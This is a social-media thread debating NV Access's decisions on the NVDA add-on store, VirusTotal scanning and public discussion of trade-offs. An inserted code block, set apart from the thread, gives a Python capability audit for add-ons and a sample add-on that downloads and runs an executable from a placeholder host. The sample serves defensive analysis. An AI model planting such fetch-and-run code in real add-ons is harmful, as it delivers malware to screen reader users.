@fastfinge I wish so much of this wasn't on-point.
* I don't have enough of an understanding of the addon store stuff to be informed, but pulling Remote into core seemed a lot of work for relatively little gain to me.
* The on-device description stuff was mad, given the profusion of other addons already out there and its crapness when they did work on it.
* The lack of a bridge from 64 bit felt like a kick in the teeth.
As you say: the move was needed, but the support for developers fell short.
I love NVDA and will champion it, but I do wonder about the direction and decisionmaking sometimes.
@cachondo @fastfinge None of it is on point, and if he'd bothered taking the time to actually ask us any of the questions up front, we would happily have cleared up any confusion.
@NVAccess @cachondo So anyone with any questions at all should ask directly and in private? That doesn't scale. The fact you can't point anyone to the public places where these answers can be found is even worse.
@fastfinge No one said that. It's an open source project, discussion happens on the issue tracker and/or mailing list. Or you can ask them here. You know this. Should NVDA have a full time public relations person to handle all concerns? Who pays for that? What priorities suffer?
Your piece seems somewhat premised on the idea that you must trust NVAccess in an informational vacuum. I don't think that's true at all. You could just... ask them why they did XYZ. If that answer isn't satisfactory, okay, the discussion has moved forward.
@prism @cachondo @NVAccess It's not based on that at all. It's based on the fact that when I search the GitHub and mailing lists, as far as I can tell these discussions don't exist.
@prism @cachondo @NVAccess Seems a bit late to discuss decisions that were already made… somewhere… by someone. Compare to the Linux kernel mailing list. If I want to know what was decided, who decided it, why they decided it, when and where, all discussion is right there. NVDA also operated this way up until the last couple of years. When Michael or Jamie decided anything, the reasoning was all in public. Even if I didn't like it, the chain of thought that got them there was fully visible.
@fastfinge @cachondo @prism As Drew suggested, what do you want to know? I'm only halfway through your article and most of it is "I don't like this feature, it shouldn't have taken developer time" when, if you'd asked, we could have told you that things like Remote Access, Image Description, Magnifier, etc. that you complain about were all done by others and only overseen by us.
@NVAccess @cachondo @prism If you have understood that to be my primary complaint, I must have written it extremely poorly, because developer time was never even mentioned once. My complaint is that things seem to be going into NVDA without openly accessible discussion or reasoning about the trade-offs. So:
* Why is NVDA scanning store addons with VirusTotal? What threat does NV Access believe this prevents, given the overall addon security landscape?
* What does NV Access believe is the purpose of addons, and when should an addon be in core vs. not? Are there types of addons that NVDA does not believe are suitable, and should just be apps on their own? What qualifies a feature for an addon vs. being part of NVDA?
* How are decisions made at NV Access, now that they aren't as frequently discussed on the GitHub or the mailing list? How should external stakeholders get involved in these decisions?
* Speaking of those decisions: what is the current thinking re: the 32-bit compatibility layer? Has this been canceled as it's no longer needed?
* What is the current thinking on the secure addon API? Are we talking about extremely restricted functionality, or code signing, or manual approval of secure addons, or all three?
* Where can we see developers' work or planning (if any) being done on corporate mode? Surely there's something other than "no news" on an issue tracker or mailing list somewhere.
I'm avoiding "Why did you do X last year" style questions, as re-litigation of things already done is utterly pointless. But these are the current questions that I am most concerned about.
@fastfinge @cachondo @prism OK, if nothing else, I can no longer complain that you haven't asked us questions.... I'm confused about the hate on VirusTotal? It's a tool which may pick up malicious code that is available, so why NOT use it? Add-on vs. core for a feature is done case by case (based on user benefit, potential downsides, initial vs. ongoing work, & more). For Remote, as previously noted, it also allowed us to tighten security by bringing those external contact points internal.
@NVAccess @cachondo @prism The hate isn't the service itself. It's that the results are being displayed in the store. I believe that this is false reassurance that makes everyone less secure just by existing. Best case, it will always return nothing, because no attacker would upload a virus directly to the store; they'll have their addon download the virus days later, once it's gotten some installs. Worst case, it makes someone think "Oh, NVDA virus scans its addons. So they're fine." Given the best case is nothing happens, and the worst case is someone is less secure, why do it? What problem is NV Access trying to solve?
@fastfinge @cachondo @prism What do you propose? At the end of the day, add-ons are potentially a risk & I think we are clear in warning users about that. If a bad add-on has to download code days later to avoid detection, at least we've made it harder for them. The add-on community itself keeps an eye on add-ons & would hopefully quite quickly alert us to any issue such as this. The alternative would be extremely tightly restricting what add-ons could do - maybe to Braille drivers & synths?
@NVAccess @cachondo @prism Well, I would first propose not doing something "because the service exists and we can". This was the kind of thinking I tried, and seem to have failed, to highlight in the article. Next, I would propose not getting stuck in an either/or mindset. The duality of "we do nothing" or "we restrict all addons forever" is a false one. What about tracking reputation of addon authors and making sure that, at least, NV Access can guarantee that the author of an addon is who they say they are? Then making it extremely clear to users who they're trusting and how much trust they're handing over. What about having a set of "reviewed addons" and then a set of "unreviewed addons" and listing them in different places, with different levels of warning, and different corporate controls? What about some sort of sandboxing, and prompting the user "Do you want to allow this addon to X?", where X is dangerous things like download and execute a third-party program, read and write files outside of the addon directory, and so on. There are all sorts of possible solutions, some easier, and some harder, that would actually do something other than "Maybe inconvenience an attacker who knows nothing about NVDA Store security someday".
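The capability-prompt and reviewed/unreviewed-tier ideas in the reply above, as an added illustration that is not part of this thread and not NVDA's or NV Access's code: a small static audit that walks an add-on's Python source with the `ast` module, maps imports and calls to coarse capabilities (network, run a program, filesystem, native code, dynamic code, registry), and then applies a store policy that either prompts the user for a capability or allows it only for reviewed add-ons. The module and call tables, the policy, the tier names and the sample "updater" add-on below are all constructed assumptions for the example; the sample is exactly the pattern the thread worries a one-time upload scan would not catch, which is why a capability audit, not a signature scan, is what flags it.

```python
"""Capability audit for an NVDA-style Python add-on (constructed example)."""
import ast
from dataclasses import dataclass

# Constructed mapping: imported module (or any prefix of it) -> capability.
MODULE_CAPABILITIES = {
    "urllib": "network",
    "http.client": "network",
    "socket": "network",
    "subprocess": "execute_program",
    "ctypes": "native_code",
    "winreg": "registry",
}

# Constructed mapping: fully qualified call -> capability.
CALL_CAPABILITIES = {
    "os.system": "execute_program",
    "os.startfile": "execute_program",
    "exec": "dynamic_code",
    "eval": "dynamic_code",
    "open": "filesystem",
    "shutil.rmtree": "filesystem",
}

# Constructed store policy: "prompt" asks the user; "reviewed_only" blocks
# the add-on unless it sits in the reviewed tier.
POLICY = {
    "network": "prompt",
    "filesystem": "prompt",
    "execute_program": "prompt",
    "dynamic_code": "reviewed_only",
    "native_code": "reviewed_only",
    "registry": "reviewed_only",
}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _add_module(caps, dotted):
    """Add the capability of the module named by any prefix of `dotted`."""
    parts = dotted.split(".")
    for i in range(1, len(parts) + 1):
        cap = MODULE_CAPABILITIES.get(".".join(parts[:i]))
        if cap:
            caps.add(cap)


def find_capabilities(source):
    """Statically collect the capabilities an add-on's source would need."""
    caps = set()
    aliases = {}  # local name -> imported name, so `import subprocess as sp` resolves
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name.split(".")[0]] = a.name
                _add_module(caps, a.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            _add_module(caps, node.module)
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name:
                head, _, rest = name.partition(".")
                full = aliases.get(head, head) + ("." + rest if rest else "")
                if full in CALL_CAPABILITIES:
                    caps.add(CALL_CAPABILITIES[full])
                _add_module(caps, full)
    return caps


@dataclass
class Decision:
    capabilities: set
    prompts: list   # questions the store would put to the user before install
    blocked: list   # capabilities refused because the add-on is unreviewed
    tier: str       # where the store would list it and how loudly it would warn


def evaluate(source, author_verified, reviewed):
    """Apply the store policy to an add-on's source and its trust metadata."""
    caps = find_capabilities(source)
    prompts, blocked = [], []
    for cap in sorted(caps):
        action = POLICY.get(cap, "prompt")
        if action == "reviewed_only" and not reviewed:
            blocked.append(cap)
        elif action == "prompt":
            prompts.append(f"Do you want to allow this add-on to use {cap}?")
    if reviewed:
        tier = "reviewed"
    elif author_verified:
        tier = "unreviewed, verified author"
    else:
        tier = "unreviewed, unverified author"
    return Decision(caps, prompts, blocked, tier)


# Constructed sample: a benign-looking "updater" that fetches and runs a file later.
SAMPLE_ADDON = '''
import globalPluginHandler
import subprocess as sp
from urllib import request

class GlobalPlugin(globalPluginHandler.GlobalPlugin):
    def script_update(self, gesture):
        data = request.urlopen("https://example.invalid/update.exe").read()
        with open("update.exe", "wb") as f:
            f.write(data)
        sp.Popen(["update.exe"])
'''

if __name__ == "__main__":
    d = evaluate(SAMPLE_ADDON, author_verified=False, reviewed=False)
    print("tier:", d.tier)
    print("capabilities:", sorted(d.capabilities))
    for q in d.prompts:
        print("prompt:", q)
    print("blocked:", d.blocked)
```

The audit is deliberately coarse: it answers "what could this add-on do?" rather than "is this add-on malicious?", which is the question a user-facing prompt or a reviewed/unreviewed listing actually needs. A real implementation would also have to look at compiled or vendored code and at strings passed to `__import__`, which an `ast` walk of one file does not see.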
@NVAccess @cachondo @prism Second reply to publicly call myself out for doing exactly the thing I'm annoyed about. I just proposed a raft of solutions without taking the time to fully understand the problem I'm solving for. Is the security problem:
* NVDA needs to work with addons in sensitive enterprise environments
* users need to be able to confidently install addons from the addon store without worrying
* users need to be able to install random addons from the internet with at least some safety
* security people need to be able to audit what an addon is doing
* something else
* all of the above
The best solution is going to depend on what the problem is, and what the available resources are for solving it. I shouldn't have offered any solutions at all without understanding the shape of the problem, because otherwise we're just doing things because we feel like things should be done. Leading me to another question: does NV Access clearly define what its problems are before it starts planning solutions to them? Or do planning and roadmaps start from the solution, rather than the problem to be solved? Because starting from the solution leads to decisions like scanning addons with an antivirus because it exists and you can.